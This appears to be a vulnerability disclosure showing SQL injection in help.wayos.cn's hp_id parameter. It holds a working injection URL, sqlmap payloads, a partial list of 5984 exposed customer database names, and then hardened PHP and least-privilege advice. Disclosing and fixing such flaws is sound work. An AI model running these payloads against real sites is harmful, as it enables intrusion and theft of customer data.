Found a SQL injection on a sub-site:
http://help.wayos.cn//detail.php?hp_id=51%20and%201=2%20union%20select%201,concat%28user%28%29,0x20,database%28%29,0x20,version%28%29%29,3,4,5,6,7,8,9,10,11
Ran it through sqlmap:
sqlmap identified the following injection points with a total of 43 HTTP(s) requests:
---
Place: GET
Parameter: hp_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hp_id=47 AND 9686=9686

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: hp_id=47 AND (SELECT 6038 FROM(SELECT COUNT(*),CONCAT(0x3a736b6a3a,(SELECT (CASE WHEN (6038=6038) THEN 1 ELSE 0 END)),0x3a7670693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: hp_id=47 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a736b6a3a,0x486c4143774e454a534c,0x3a7670693a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: hp_id=47 AND SLEEP(5)
---
Then I found that the database server actually holds close to 6000 databases. Good grief, what is all this?
Database naming scheme: the customer's name for their wayos product + Radius
available databases [5984]:
[*] a00jian_Radius
[*] A023A_Radius
[*] a03551_Radius
[*] a10000_Radius
[*] a100144_Radius
[*] a10104091_Radius
[*] a102699_Radius
[*] a107258222_Radius
[*] a109738668_Radius
[*] a111111112_Radius
[*] a11111111_Radius
[*] a11111_Radius
[*] a1111_Radius
[*] a112013_Radius
[*] a11788_Radius
.............
.............
.............
[*] zzq520_Radius
[*] zzqjsy_Radius
[*] zzsj0371_Radius
[*] zzvnet_Radius
[*] zzxqcdc_Radius
[*] zzy1981_Radius
[*] zzy8202003_Radius
[*] zzzfan007_Radius
Fix: filter the input.
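A concrete form of that fix, as an added example rather than code from the report or from wayos: the hp_id lookup in detail.php rewritten to validate the parameter as an integer and pass it through a prepared statement. The table and column names (help, hp_id, title, content), the connection settings and the account name are assumptions; the report only shows the URL and the sqlmap output.

```php
<?php
// Added example, not the original detail.php. Assumes a MySQL table `help`
// with an integer primary key `hp_id` (names are assumptions).
// The pattern behind the finding above is building the query by string
// concatenation, e.g. "SELECT ... WHERE hp_id=" . $_GET['hp_id'], which lets
// the value be parsed as SQL. The hardened version does two things:
//   1. rejects anything that is not a positive integer before any SQL exists;
//   2. sends the value as a bound parameter, so it is data, never SQL text.

declare(strict_types=1);

function loadHelpEntry(PDO $db, string $rawId): ?array
{
    // Step 1: strict type check. FILTER_VALIDATE_INT returns false for
    // "51 and 1=2 union select ..." and for "47 AND SLEEP(5)".
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // Step 2: prepared statement with a typed bound parameter.
    $stmt = $db->prepare('SELECT hp_id, title, content FROM help WHERE hp_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Placeholder credentials. ATTR_EMULATE_PREPARES = false makes MySQL bind the
// value server-side instead of PDO interpolating it into the query string.
$db = new PDO(
    'mysql:host=127.0.0.1;dbname=help_db;charset=utf8mb4',
    'help_app',          // assumed low-privilege account scoped to help_db only
    'PASSWORD_PLACEHOLDER',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]
);

$entry = loadHelpEntry($db, $_GET['hp_id'] ?? '');
if ($entry === null) {
    http_response_code(404);
    exit('Not found');
}
echo htmlspecialchars($entry['title'], ENT_QUOTES, 'UTF-8');
```

The second defensive point the report makes implicitly: sqlmap was able to list 5984 databases, so the account the help site connects with can see every customer's Radius database. Even with the query fixed, that account should be a dedicated user granted SELECT on the help database alone, so that any future injection elsewhere on the site cannot enumerate or read customer data.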